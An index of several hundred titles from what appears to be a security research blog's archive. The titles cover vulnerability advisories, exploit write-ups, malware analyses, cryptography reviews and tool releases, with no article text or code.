Technical Advisory: Ruby on Rails – Possible XSS Vulnerability in ActionView tag helpers (CVE-2022-27777)
North Korea’s Lazarus: their initial access trade-craft using social media and social engineering
Adventures in the land of BumbleBee – a new malicious loader
LAPSUS$: Recent techniques, tactics and procedures
Real World Cryptography Conference 2022
Mitigating the top 10 security threats to GCP using the CIS Google Cloud Platform Foundation Benchmark
A brief look at Windows telemetry: CIT aka Customer Interaction Tracker
Public Report – Google Enterprise API Security Assessment
Conti-nuation: methods and techniques observed in operations post the leaks
Whitepaper – Double Fetch Vulnerabilities in C and C++
Mining data from Cobalt Strike beacons
Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23121)
Tool Release – ScoutSuite 5.11.0
Technical Advisory – Apple macOS XAR – Arbitrary File Write (CVE-2022-22582)
Microsoft announces the WMIC command is being retired, Long Live PowerShell
SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store
Estimating the Bit Security of Pairing-Friendly Curves
Detecting anomalous Vectored Exception Handlers on Windows
BrokenPrint: A Netgear stack overflow
Public Report – O(1) Labs Mina Client SDK, Signature Library and Base Components Cryptography and Implementation Review
Testing Infrastructure-as-Code Using Dynamic Tooling
10 real-world stories of how we’ve compromised CI/CD pipelines
NCC Group’s 2021 Annual Research Report
On the malicious use of large language models like GPT-3
Technical Advisory – Lenovo ImController Local Privilege Escalation (CVE-2021-3922, CVE-2021-3969)
Choosing the Right MCU for Your Embedded Device — Desired Security Features of Microcontrollers
FPGAs: Security Through Obscurity?
Public Report – WhatsApp opaque-ke Cryptographic Implementation Review
log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228
Log4Shell: Reconnaissance and post exploitation network detection
Announcing NCC Group’s Cryptopals Guided Tour!
Technical Advisory – SonicWall SMA 100 Series – Unauthenticated Arbitrary File Deletion
Technical Advisory – SonicWall SMA 100 Series – Unauthenticated Stored XSS
Technical Advisory – SonicWall SMA 100 Series – Multiple Unauthenticated Heap-based and Stack-based Buffer Overflow (CVE-2021-20045)
Technical Advisory – SonicWall SMA 100 Series – Post-Authentication Remote Command Execution (CVE-2021-20044)
Technical Advisory – SonicWall SMA 100 Series – Heap-Based Buffer Overflow (CVE-2021-20043)
Technical Advisory – SonicWall SMA 100 Series – Unauthenticated File Upload Path Traversal (CVE-2021-20040)
Why IoT Security Matters
Technical Advisory – Authenticated SQL Injection in SOAP Request in Broadcom CA Network Flow Analysis (CVE-2021-44050)
Encryption Does Not Equal Invisibility – Detecting Anomalous TLS Certificates with the Half-Space-Trees Algorithm
Tracking a P2P network related to TA505
Conference Talks – December 2021
Public Report – Zendoo Proof Verifier Cryptography Review
An Illustrated Guide to Elliptic Curve Cryptography Validation
Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks
POC2021 – Pwning the Windows 10 Kernel with NTFS and WNF Slides
Technical Advisory – Multiple Vulnerabilities in Victure WR1200 WiFi Router (CVE-2021-43282, CVE-2021-43283, CVE-2021-43284)
“We wait, because we know you.” Inside the ransomware negotiation economics.
Detection Engineering for Kubernetes clusters
Vaccine Misinformation Part 1: Misinformation Attacks as a Cyber Kill Chain
Technical Advisory – Arbitrary Signature Forgery in Stark Bank ECDSA Libraries (CVE-2021-43572, CVE-2021-43570, CVE-2021-43569, CVE-2021-43568, CVE-2021-43571)
TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial access
Public Report – Zcash NU5 Cryptography Review
The Next C Language Standard (C23)
Conference Talks – November 2021
Technical Advisory – Apple XAR – Arbitrary File Write (CVE-2021-30833)
Public Report – WhatsApp End-to-End Encrypted Backups Security Assessment
Cracking RDP NLA Supplied Credentials for Threat Intelligence
Detecting and Protecting when Remote Desktop Protocol (RDP) is open to the Internet
Enterprise-scale seamless onboarding and deployment of Azure Sentinel using Lighthouse for multi-tenant environments
Cracking Random Number Generators using Machine Learning – Part 2: Mersenne Twister
Cracking Random Number Generators using Machine Learning – Part 1: xorshift128
NCC Group placed first in global 5G Cyber Security Hack competition
Paradoxical Compression with Verifiable Delay Functions
A Look At Some Real-World Obfuscation Techniques
SnapMC skips ransomware, steals data
The Challenges of Fuzzing 5G Protocols
Reverse engineering and decrypting CyberArk vault credential files
Technical Advisory – Open5GS Stack Buffer Overflow During PFCP Session Establishment on UPF (CVE-2021-41794)
Assessing the security and privacy of Vaccine Passports
Technical Advisory – NULL Pointer Derefence in McAfee Drive Encryption (CVE-2021-23893)
Conference Talks – October 2021
Technical Advisory – Garuda Linux Insecure User Creation (CVE-2021-3784)
Detecting and Hunting for the PetitPotam NTLM Relay Attack
Technical Advisory: PDFTron JavaScript URLs Allowed in WebViewer UI (CVE-2021-39307)
Optimizing Pairing-Based Cryptography: Montgomery Multiplication in Assembly
CertPortal: Building Self-Service Secure S/MIME Provisioning Portal
NSA & CISA Kubernetes Security Guidance – A Critical Review
Technical Advisory – New York State Excelsior Pass Vaccine Passport Credential Forgery
Technical Advisory – New York State Excelsior Pass Vaccine Passport Scanner App Sends Data to a Third Party not Specified in Privacy Policy
Conference Talks – September 2021
The ABCs of NFC chip security
CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2
Disabling Office Macros to Reduce Malware Infections
Some Musings on Common (eBPF) Linux Tracing Bugs
Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Archive Extraction – CVE-2021-22937 (Patch Bypass)
Technical Advisory – Sunhillo SureLine Unauthenticated OS Command Injection (CVE-2021-36380)
Practical Considerations of Right-to-Repair Legislation
Technical Advisory – ICTFAX 7-4 – Indirect Object Reference
Technical Advisory: Stored and Reflected XSS Vulnerability in Nagios Log Server (CVE-2021-35478,CVE-2021-35479)
Detecting and Hunting for the Malicious NetFilter Driver
CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1
NCC Group Research at Black Hat USA 2021 and DEF CON 29
Alternative Approaches for Fault Injection Countermeasures (Part 3/3)
Software-Based Fault Injection Countermeasures (Part 2/3)
An Introduction to Fault Injection (Part 1/3)
Technical Advisory – Arbitrary File Read in Dell Wyse Management Suite (CVE-2021-21586, CVE-2021-21587)
Exploiting the Sudo Baron Samedit vulnerability (CVE-2021-3156) on VMWare vCenter Server 7.0
Technical Advisory – Shop app sends pasteboard data to Shopify’s servers
Tool Release – Reliably-checked String Library Binding
Are you oversharing (in Salesforce)? Our new tool could sniff it out!
Exploit mitigations: keeping up with evolving and complex software/hardware
NCC Group co-signs the Electronic Frontier Foundation’s Statement on DMCA Use Against Security Researchers
Handy guide to a new Fivehands ransomware variant
On the Use of Pedersen Commitments for Confidential Payments
Incremental Machine Learning by Example: Detecting Suspicious Activity with Zeek Data Streams, River, and JA3 Hashes
Testing Two-Factor Authentication
Optimizing Pairing-Based Cryptography: Montgomery Arithmetic in Rust
Research Paper – Machine Learning for Static Malware Analysis, with University College London
Conference Talks – June 2021
Public Report – Protocol Labs Groth16 Proof Aggregation: Cryptography and Implementation Review
iOS User Enrollment and Trusted Certificates
Detecting Rclone – An Effective Tool for Exfiltration
Supply Chain Security Begins with Secure Software Development
Toxic Tokens: Using UUIDs for Authorization is Dangerous (even if they’re cryptographically random)
Public Report – Dell Secured Component Verification
RM3 – Curiosities of the wildest banking malware
Conference Talks – May 2021
A Census of Deployed Pulse Connect Secure (PCS) Versions
NCC Group’s Upcoming Trainings at Black Hat USA 2021
Public Report – VPN by Google One: Technical Security & Privacy Assessment
Technical Advisory – ParcelTrack sends all pasteboard data to ParcelTrack’s servers on startup
Tool Release – Principal Mapper v1.1.0 Update
SAML XML Injection
The Future of C Code Review
RIFT: Detection capabilities for recent F5 BIG-IP/BIG-IQ iControl REST API vulnerabilities CVE-2021-22986
Tool Release – Solitude: A privacy analysis tool
Deception Engineering: exploring the use of Windows Installer Packages against first stage payloads
Lending a hand to the community – Covenant v0.7 Updates
Technical Advisory: Dell SupportAssist Local Privilege Escalation (CVE-2021-21518)
Technical Advisory – Multiple Vulnerabilities in Netgear ProSAFE Plus JGS516PE / GS116Ev2 Switches
Deception Engineering: exploring the use of Windows Service Canaries against ransomware
Wubes: Leveraging the Windows 10 Sandbox for Arbitrary Processes
Technical Advisory: Administrative Passcode Recovery and Authenticated Remote Buffer Overflow Vulnerabilities in Gigaset DX600A Handset (CVE-2021-25309, CVE-2021-25306)
Cryptopals: Exploiting CBC Padding Oracles
Investigating Potential Security Vulnerability Manifestation through Various Analyses & Inferences Regarding Internet RFCs (and how RFC Security might be Improved)
NCC Group’s 2020 Annual Research Report
Conference Talks – February/March 2021
Software Verification and Analysis Using Z3
Technical Advisory – Linksys WRT160NL – Authenticated Command Injection (CVE-2021-25310)
Real World Cryptography Conference 2021: A Virtual Experience
RIFT: Analysing a Lazarus Shellcode Execution Method
MSSQL Lateral Movement
Public Report – BLST Cryptographic Implementation Review
Sign over Your Hashes – Stealing NetNTLM Hashes via Outlook Signatures
Abusing cloud services to fly under the radar
Building an RDP Credential Catcher for Threat Intelligence
Double-odd Elliptic Curves
Using AWS and Azure for Cost Effective Log Ingestion with Data Processing Pipelines for SIEMs
Domestic IoT Nightmares: Smart Doorbells
Technical Advisory: OS Command Injection in Silver Peak EdgeConnect Appliances (CVE-2020-12148, CVE-2020-12149)
Helping Engineering Teams Tackle Security Debt in Embedded Systems: U-Boot Configuration Auditing Introduced in Depthcharge v0.2.0
An Adventure in Contingency Debugging: Ruby IO#read/IO#write Considered Harmful
ABSTRACT SHIMMER (CVE-2020-15257): Host Networking is root-Equivalent, Again
Tool Release – HTTPSignatures: A Burp Suite Extension Implementing HTTP Signatures
ICS/OT Security & the evolution of the Purdue Model: Integrating Industrial and Business Networks
Tool Release – Carnivore: Microsoft External Assessment Tool
Technical Advisory: containerd – containerd-shim API Exposed to Host Network Containers (CVE-2020-15257)
Conference Talks – December 2020
TA505: A Brief History Of Their Time
Decrypting OpenSSH sessions for fun and profit
Past, Present and Future of Effective C
Technical Advisory: SQL Injection and Reflected Cross-Site Scripting (XSS) Vulnerabilities in Oracle Communications Diameter Signaling Router (CVE-2020-14787, CVE-2020-14788)
Technical Advisory: Command Injection
Conference Talks – November 2020
Technical Advisory: Pulse Connect Secure – Arbitrary File Read via Logon Message (CVE-2020-8255)
Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Gzip Extraction (CVE-2020-8260)
Technical Advisory – Jitsi Meet Electron – Arbitrary Client Remote Code Execution (CVE-2020-27162)
Technical Advisory – Jitsi Meet Electron – Limited Certificate Validation Bypass (CVE-2020-27161)
Public Report – Filecoin Bellman and BLS Signatures Cryptographic Review
Technical Advisory – Linksys WRT160NL – Authenticated Remote Buffer Overflow (CVE-2020-26561)
There’s A Hole In Your SoC: Glitching The MediaTek BootROM
RIFT: F5 CVE-2020-5902 and Citrix CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 honeypot data release
Technical Advisory – Pulse Connect Secure – RCE via Template Injection (CVE-2020-8243)
Tool – Windows Executable Memory Page Delta Reporter
Salesforce Security with Remote Working
Tool Release – ScoutSuite 5.10
Conference Talks – October 2020
Tool Release – ICPin, an integrity-check and anti-debug detection pintool
Faster Modular Inversion and Legendre Symbol, and an X25519 Speed Record
Technical Advisory – Lansweeper Privilege Escalation via CSRF Using HTTP Method Interchange (CVE-2020-13658)
Online Casino Roulette – A guideline for penetration testers and security researchers
Extending a Thinkst Canary to become an interactive honeypot
StreamDivert: Relaying (specific) network connections
Public Report – Electric Coin Company NU4 Cryptographic Specification and Implementation Review
Machine learning from idea to reality: a PowerShell case study
Conference Talks – September 2020
Whitepaper – Exploring the Security of KaiOS Mobile Applications
Technical Advisory – wolfSSL TLS 1.3 Client Man-in-the-Middle Attack (CVE-2020-24613)
Technical Advisory – Multiple HTML Injection Vulnerabilities in KaiOS Pre-installed Mobile Applications
Technical Advisory – FreePBX – Multiple Authenticated SQL Injections in UCP application
Immortalising 20 Years of Epic Research
Pairing over BLS12-381, Part 3: Pairing!
Public Report – Pixel 4/4XL and Pixel 4a ioXt Audit
NCC Group researchers named amongst MSRC’s Most Valuable Security Researchers in 2020
Lights, Camera, HACKED! An insight into the world of popular IP Cameras
Conference Talks – August 2020
Tool Release – Winstrument: An Instrumentation Framework for Windows Application Assessments
Tool Release: Sinking U-Boots with Depthcharge
Technical Advisory: Heartbleed chained with a Pass-the-Hash attack leads to device compromise on TP-Link C200 IP Camera
Public Report – Qredo Apache Milagro MPC Cryptographic Assessment
Pairing over BLS12-381, Part 2: Curves
Understanding the root cause of F5 Networks K52145254: TMUI RCE vulnerability CVE-2020-5902
RIFT: Citrix ADC Vulnerabilities CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 Intelligence
An offensive guide to the Authorization Code grant
Technical Advisory – KwikTag Web Admin Authentication Bypass
Pairing over BLS12-381, Part 1: Fields
RIFT: F5 Networks K52145254: TMUI RCE vulnerability CVE-2020-5902 Intelligence
Experiments in Extending Thinkst Canary – Part 1
Tool Release – ScoutSuite 5.9.0
Technical Advisory – macOS Installer Local Root Privilege Escalation (CVE-2020-9817)
Paper: Thematic for Success in Real-World Offensive Cyber Operations – How to make threat actors work harder and fail more often
How-to: Importing WStalker CSV (and more) into Burp Suite via Import to Sitemap Extension
Tool: WStalker – an easy proxy to support Web API assessments
Security Considerations of zk-SNARK Parameter Multi-Party Computation
WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group
Tool Release – Socks Over RDP Now Works With Citrix
Striking Back at Retired Cobalt Strike: A look at a legacy vulnerability
Technical Advisory – ARM MbedOS USB Mass Storage Driver Memory Corruption
Cyber Security of New Space Paper
In-depth analysis of the new Team9 malware family
Common Insecure Practices with Configuring and Extending Salesforce
Exploring DeepFake Capabilities & Mitigation Strategies with University College London
Game Security
Exploring macOS Calendar Alerts: Part 2 – Exfiltrating data (CVE-2020-3882)
Research Report – Zephyr and MCUboot Security Assessment
CVE-2018-8611 Exploiting Windows KTM Part 5/5 – Vulnerability detection and a better read/write primitive
CVE-2018-8611 Exploiting Windows KTM Part 4/5 – From race win to kernel read and write primitive
Using SharePoint as a Phishing Platform
Public Report – Coda Cryptographic Review
Shell Arithmetic Expansion and Evaluation Abuse
CVE-2018-8611 Exploiting Windows KTM Part 3/5 – Triggering the race condition and debugging tricks
Tool Release – Socks Over RDP
Exploring macOS Calendar Alerts: Part 1 – Attempting to execute code
CVE-2018-8611 Exploiting Windows KTM Part 2/5 – Patch analysis and basic triggering
Practical Machine Learning for Random (Filename) Detection
Curve9767 and Fast Signature Verification
CVE-2018-8611 Exploiting Windows KTM Part 1/5 – Introduction
The Extended AWS Security Ramp-Up Guide
Code Patterns for API Authorization: Designing for Security
Order Details Screens and PII
How cryptography is used to monitor the spread of COVID-19
Rise of the Sensors: Securing LoRaWAN Networks
C Language Standards Update – Zero-size Reallocations are Undefined Behavior
IETF Draft: Indicators of Compromise and Their Role in Attack and Defen[c|s]e
Exploring Verifiable Random Functions in Code
Crave the Data: Statistics from 1,300 Phishing Campaigns
Impact of DNS over HTTPS (DoH) on DNS Rebinding Attacks
Tool Release – ScoutSuite 5.8.0
Whitepaper – Coinbugs: Enumerating Common Blockchain Implementation-Level Vulnerabilities
Smart Contracts Inside SGX Enclaves: Common Security Bug Patterns
LDAPFragger: Bypassing network restrictions using LDAP attributes
Threat Actors: exploiting the pandemic
A Survey of Istio’s Network Security Features
Conference Talks – March 2020
Public Report – RustCrypto AES/GCM and ChaCha20+Poly1305 Implementation Review
Reviewing Verifiable Random Functions
CVE-2018-8611 – Diving into the Windows Kernel Transaction Manager (KTM) for fun and exploitation
Whitepaper – Microcontroller Readback Protection: Bypasses and Defenses
Improving Software Security through C Language Standards
Whitepaper – A Tour of Curve 25519 in Erlang
Deep Dive into Real-World Kubernetes Threats
Technical Advisory – playSMS Pre-Authentication Remote Code Execution (CVE-2020-8644)
Interfaces.d to RCE
Properly Signed Certificates on CPE Devices
Conference Talks – February 2020
Tool Release – Collaborator++
Public Report – Electric Coin Company NU3 Specification and Blossom Implementation Audit
Tool Release – Enumerating Docker Registries with go-pillage-registries
Conference Talks – January 2020
Passive Decryption of Ethereum Peer-to-Peer Traffic
On Linux’s Random Number Generation
Demystifying AWS’ AssumeRole and sts:ExternalId
Welcome to the new NCC Group Global Research blog
Technical Advisory: Gaining root access on Sumpple S610 IP Camera via Telnet; and Unprotected client and server data transmission between Android and IOS clients
Security impact of IoT on the Enterprise
Secure Device Provisioning Best Practices: Heavy Truck Edition
CVE-2019-1405 and CVE-2019-1322 – Elevation to SYSTEM via the UPnP Device Host Service and the Update Orchestrator Service
Padding the struct: How a compiler optimization can disclose stack memory
Embedded Device Security Certifications
An Introduction to Ultrasound Security Research
PhanTap (Phantom Tap): Making networks spookier one packet at a time
An Introduction to Quantum Computing for Security Professionals
Sniffle: A Sniffer for Bluetooth 5
Compromising a Hospital Network for £118 (Plus Postage & Packaging)
Getting Shell with XAMLX Files
Kerberos Resource-Based Constrained Delegation: When an Image Change Leads to a Privilege Escalation
Technical Advisory: CyberArk EPM Non-paged Pool Buffer Overflow
Technical Advisory: Unauthenticated SQL Injection in Lansweeper
Jenkins Plugins and Core Technical Summary Advisory
Technical Advisory: Multiple Vulnerabilities in Ricoh Printers
Technical Advisory: Multiple Vulnerabilities in Brother Printers
Technical Advisory: Multiple Vulnerabilities in Xerox Printers
Technical Advisory: Multiple Vulnerabilities in Kyocera Printers
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 10: Efficacy Demonstration, Project Conclusion and Next Steps
Technical Advisory: Multiple Vulnerabilities in HP Printers
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 9: Adventures with Expert Systems
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 8: Development of Prototype #4 – Building on Takaesu’s Approach with Focus on XSS
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 7: Development of Prototype #3 – Adventures in Anomaly Detection
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 6: Development of Prototype #2 – Creating a SQLi PoC
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 5: Development of Prototype #1 – Text Processing and Semantic Relationships
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 4: Architecture and Design
Technical Advisory – Authorization Bypass Allows for Pinboard Corruption
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 3: Understanding Existing Approaches and Attempts
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 2: Going off on a Tangent – AI/ML Applications in Social Engineering
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 1: Understanding the Basics and What Platforms and Frameworks Are Available
Technical Advisory: Multiple Vulnerabilities in Lexmark Printers
Technical Advisory: Intel Driver Support & Assistance – Local Privilege Escalation
Technical Advisory: Citrix Workspace / Receiver Remote Code Execution Vulnerability
The Sorry State of Aftermarket Head Unit Security
Cyber Security in UK Agriculture
NCC Group Connected Health Whitepaper July 2019
Story of a Hundred Vulnerable Jenkins Plugins
Whitepaper – Hardware-Backed Heist: Extracting ECDSA Keys from Qualcomm’s TrustZone
Technical Advisory: Multiple Vulnerabilities in SmarterMail
Technical Advisory – DelTek Vision – Arbitrary SQL Execution (SQLi)
eBPF Adventures: Fiddling with the Linux Kernel and Unix Domain Sockets
Chafer backdoor analysis
Finding and Exploiting .NET Remoting over HTTP using Deserialisation
Technical Advisory: Multiple Vulnerabilities in MailEnable
Assessing Unikernel Security
Technical Advisory: IP Office Stored Cross Site Scripting (XSS) Vulnerability
Zcash Overwinter Consensus and Sapling Cryptography Review
Xendbg: A Full-Featured Debugger for the Xen Hypervisor
Use of Deserialisation in .NET Framework Methods and Classes
Owning the Virgin Media Hub 3.0: The perfect place for a backdoor
Nine years of bugs at NCC Group
The 9 Lives of Bleichenbacher’s CAT: New Cache ATtacks on TLS Implementations
Third party assurance
Turla PNG Dropper is back
Public cloud
Android Cloud Backup/Restore
Spectre on a Television
RokRat Analysis
Technical Advisory: SMB Hash Hijacking and User Tracking in MS Outlook
Technical Advisory: Authentication Bypass in libSSH
Securing Google Cloud Platform – Ten best practices
Public Report – Android Cloud Backup/Restore
Much Ado About Hardware Implants
NCC Group’s Exploit Development Capability: Why and What
Technical Advisory: Bypassing Workflows Protection Mechanisms – Remote Code Execution on SharePoint
Technical Advisory: Mosquitto Broker DoS through a Memory Leak vulnerability
Improving Your Embedded Linux Security Posture With Yocto
How I did not get a shell
Technical Advisory: Mitel MiVoice 5330e Memory Corruption Flaw
Singularity of Origin
Proxy Re-Encryption Protocol: IronCore Public Report
Technical Advisory: Bypassing Microsoft XOML Workflows Protection Mechanisms using Deserialisation of Untrusted Data
Celebrating NCC Con Europe 2018
The disadvantages of a blacklist-based approach to input validation
Securing Teradata Database
Technical Advisory: Unauthenticated Remote Command Execution through Multiple Vulnerabilities in Virgin Media Hub 3.0
Ethics in Security Testing
Freddy: An extension for automatically identifying deserialisation issues in Java and .NET applications
Sobelow Update
House
Principal Mapper (pmapper)
Return of the hidden number problem
Technical advisory: “ROHNP”- key extraction side channel in multiple crypto libraries
CVE-2017-8570 RTF and the Sisfader RAT
Mallory: Transparent TCP and UDP Proxy
Mallory and Me: Setting up a Mobile Mallory Gateway
CyberVillainsCA
DECTbeacon
Fuzzbox
Gizmo
HTTP Profiler
Intent Sniffer
Intent Fuzzer
iSEC Partners Releases SSLyze
Jailbreak
Manifest Explorer
Package Play
ProxMon
pySimReader
SAML Pummel
SecureBigIP
SecureCisco
SecureCookies
SecureIE.ActiveX
WebRATS
AWS Inventory: A tool for mapping AWS resources
Extractor
CMakerer: A small tool to aid CLion’s indexing
Emissary Panda – A potential new malicious tool
SMB hash hijacking & user tracking in MS Outlook
Testing HTTP/2 only web services
Windows IPC Fuzzing Tools
WSBang
WSMap
Nerve
Ragweed
File Fuzzers
Kivlad
Android SSL Bypass
Hiccupy
iOS SSL Killswitch
The SSL Conservatory
TLSPretense — SSL/TLS Client Testing Framework
tcpprox
YoNTMA
Tattler
PeachFarmer
Android-KillPermAndSigChecks
Android-OpenDebug
Android-SSL-TrustKiller
Introspy for Android
RtspFuzzer
SSLyze v0.8
NCLoader
IG Learner Walkthrough
Forensic Fuzzing Tools
Security First Umbrella
Autochrome
WSSiP: A Websocket Manipulation Proxy
AssetHook
Call Map: A Tool for Navigating Call Graphs in Python
Sobelow: Static analysis for the Phoenix Framework
G-Scout
Decoder Improved Burp Suite Plugin
Python Class Informer: an IDAPython plugin for viewing run-time type information (RTTI)
AutoRepeater: Automated HTTP Request Repeating With Burp Suite
TPM Genie
Open Banking: Security considerations & potential risks
scenester
port-scan-automation
Windows DACL Enum Project
Shocker
whitebox
vlan-hopping
tybocer
xcavator
WindowsJobLock
Azucar
Introducing Azucar
Readable Thrift
Decoding network data from a Gh0st RAT variant
Technical Advisory: Multiple Vulnerabilities in ManageEngine Desktop Central
Discovering Smart Contract Vulnerabilities with GOATCasino
BLEBoy
APT15 is Alive and Strong: An Analysis of RoyalCli and RoyalDNS
TPM Genie: Interposer Attacks Against the Trusted Platform Module Serial Bus
Technical Advisory: Code Execution by Unsafe Resource Handling in Multiple Microsoft Products
Technical Advisory: Code Execution by Viewing Resource Files in .NET Reflector
Technical Advisory: Reflected Cross-Site Scripting (XSS) vulnerability in Jenkins Delivery Pipeline plugin
Spectre and Meltdown: What you Need to Know
The economics of defensive security
HIDDEN COBRA Volgmer: A Technical Analysis
Integrity destroying malicious code for financial or geopolitical gain: A vision of the future?
Kubernetes Security: Consider Your Threat Model
Mobile & web browser credential management: Security implications, attack cases & mitigations
SOC maturity & capability
Automated Reverse Engineering of Relationships Between Data Structures in C++ Binaries
Pointer Sequence Reverser (PSR)
Cisco ASA series part eight: Exploiting the CVE-2016-1287 heap overflow over IKEv1
Bypassing Android’s Network Security Configuration
Technical Advisory – Bomgar Remote Support – Local Privilege Escalation
Cisco ASA series part seven: Checkheaps
Adversarial Machine Learning: Approaches & defences
eBook: Breach notification under GDPR – How to communicate a personal data breach
Cisco ASA series part six: Cisco ASA mempools
The Update Framework (TUF) Security Assessment
Cisco ASA series part five: libptmalloc gdb plugin
Technical Advisory: Adobe ColdFusion RMI Registry.bind() Deserialisation RCE
Technical Advisory: Adobe ColdFusion Object Deserialisation RCE
Cisco ASA series part four: dlmalloc-2.8.x, libdlmalloc, & dlmalloc on Cisco ASA
Decoder Improved Burp Suite plugin release part two
Cisco ASA series part three: Debugging Cisco ASA firmware
Managing PowerShell in a modern corporate environment
Cisco ASA series part two: Static analysis & datamining of Cisco ASA firmware
Cisco ASA series part one: Intro to the Cisco ASA
EternalGlue part one: Rebuilding NotPetya to assess real-world resilience
Technical Advisory: Authentication rule bypass
Decoder Improved Burp Suite plugin release part one
Technical advisory: Remote shell commands execution in ttyd
Poison Ivy string decryption
Securing the continuous integration process
Signaturing an Authenticode anomaly with Yara
Analysing a recent Poison Ivy sample
Endpoint connectivity
DeLux Edition: Getting root privileges on the eLux Thin Client OS
UK government cyber security guidelines for connected & autonomous vehicles
Smuggling HTA files in Internet Explorer/Edge
Database Security Brief: The Oracle Critical Patch Update for April 2007
Buffer Underruns, DEP, ASLR and improving the Exploitation Prevention Mechanisms (XPMs) on the Windows platform
Data-mining with SQL Injection and Inference
The Pharming Guide – Understanding and preventing DNS related attacks by phishers
Weak Randomness Part I – Linear Congruential Random Number Generators
Exploiting PL/SQL Injection Flaws with only CREATE SESSION Privileges
Blind Exploitation of Stack Overflow Vulnerabilities
Slotting Security into Corporate Development
Creating Arbitrary Shellcode In Unicode Expanded Strings
Violating Database – Enforced Security Mechanisms
Hacking the Extensible Firmware Interface
Advanced Exploitation of Oracle PL/SQL Flaws
Firmware Rootkits: The Threat to the Enterprise
Database Security: A Christmas Carol
Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server
Non-flood/non-volumetric Distributed Denial of Service (DDoS)
VoIP Security Methodology and Results
E-mail Spoofing and CDONTS.NEWMAIL
Dangling Cursor Snarfing: A New Class of Attack in Oracle
Database Servers on Windows XP and the unintended consequences of simple file sharing
DNS Pinning and Web Proxies
Technical advisory: CVE-2017-8592 – XMLHttpRequest in IE followed 307 redirections with additional or customised headers
Which database is more secure? Oracle vs. Microsoft
Variations in Exploit methods between Linux and Windows
Using graph databases to assess the security of thingernets based on the thingabilities and thingertivity of things
Live Incident Blog: June Global Ransomware Outbreak
Beyond data loss prevention
How to protect yourself & your organisation from phishing attacks
Rise of the machines: Machine Learning & its cyber security applications
Combating Java Deserialisation Vulnerabilities with Look-Ahead Object Input Streams (LAOIS)
A WarCon 2017 Presentation: Cisco ASA – Exploiting the IKEv1 Heap Overflow – CVE-2016-1287
Latest threats to the connected car & intelligent transport ecosystem
Network Attached Security: Attacking a Synology NAS
Accessing Private Fields Outside of Classes in Java
Understanding the insider threat & how to mitigate it
Matty McMattface: Security implications, mitigations & testing strategies for biometric facial recognition systems
Setting a New Standard for Kubernetes Deployments
Encryption at rest: Not the panacea to data protection
Applying normalised compression distance for architecture classification
Microsoft Zero-Day Vulnerability – OLE2Link – Threat Intelligence and Signatures
D-LINK DIR-850L web admin interface vulnerable to stack-based buffer overflow
Fix Bounty
Unauthenticated XML eXternal Entity (XXE) vulnerability
General Data Protection Regulation: Knowing your data
Technical Advisory: Shell Injection in MacVim mvim URI Handler
Technical Advisory: Shell Injection in SourceTree
SCOMplicated? – Decrypting SCOM “RunAs” credentials
Technical Advisory: Multiple Vulnerabilities in Accellion File Transfer Appliance
ISM RAT
Mergers & Acquisitions (M&A) cyber security due diligence
Advisory-CraigSBlackie-CVE-2016-9795
Best practices with BYOD
Technical Advisory: Nexpose Hard‐coded Java Key Store Passphrase Allows Decryption of Stored Credentials
Compromising Apache Tomcat via JMX access
Berserko: Kerberos Authentication for Burp Suite
Java RMI Registry.bind() Unvalidated Deserialization
NCC CON Europe 2017
Understanding cyber risk management vs uncertainty with confidence in 2017
iOS MobileSlideShow USB Image Class arbitrary code execution.txt
Denial of Service in Parsing a URL by ierutil.dll
U plug, we play
SSL checklist for pentesters
Dissecting social engineering attacks
External Enumeration and Exploitation of Email and Web Security Solutions
Social Engineering
Phishing Stories
Automating extraction from malware and recent campaign analysis
DDoS Common Approaches and Failings
Absolute Security
How much training should staff have on cyber security?
USB under the bonnet: Implications of USB security vulnerabilities in vehicle systems
Cyber Essentials Scheme
Webinar – PCI Version 3.0: Are you ready?
Webinar: 4 Secrets to a Robust Incident Response Plan
Cloud Security Presentation
Webinar: SMACK, SKIP-TLS & FREAK SSL/TLS vulnerabilities
Revealing Embedded Fingerprints: Deriving intelligence from USB stack interactions
Memory Gap
44Con2013Game
creep-web-app-scanner
ncccodenavi
Pip3line
typofinder
DIBF – Updated
IODIDE
CECSTeR
cisco-SNMP-enumeration
dotnetpaddingoracle
dotnetpefuzzing
easyda
EDIDFuzzer
Fat-Finger
firstexecution
grepify
FrisbeeLite
State-of-the-art email risk
Ransomware: what organisations can do to survive
hostresolver
lapith
metasploitavevasion
Maritime Cyber Security: Threats and Opportunities
IP-reputation-snort-rule-generator
The L4m3ne55 of Passw0rds: Notes from the field
Mature Security Testing Framework
Exporting non-exportable RSA keys
Black Hat USA 2015 presentation: Broadcasting your attack-DAB security
The role of security research in improving cyber security
Self-Driving Cars- The future is now…
They Ought to Know Better: Exploiting Security Gateways via their Web Interfaces
Mobile apps and security by design
The Myth of Twelve More Bytes: Security on the Post-Scarcity Internet
When Security Gets in the Way: PenTesting Mobile Apps That Use Certificate Pinning
USB Undermining Security Barriers:further adventures with USB
Software Security Austerity Security Debt in Modern Software Development
RSA Conference – Mobile Threat War Room
Finding the weak link in binaries
To dock or not to dock, that is the question: Using laptop docking stations as hardware-based attack platforms
Harnessing GPUs Building Better Browser Based Botnets
The Browser Hacker’s Handbook
SQL Server Security
The Database Hacker’s Handbook
Social Engineering Penetration Testing
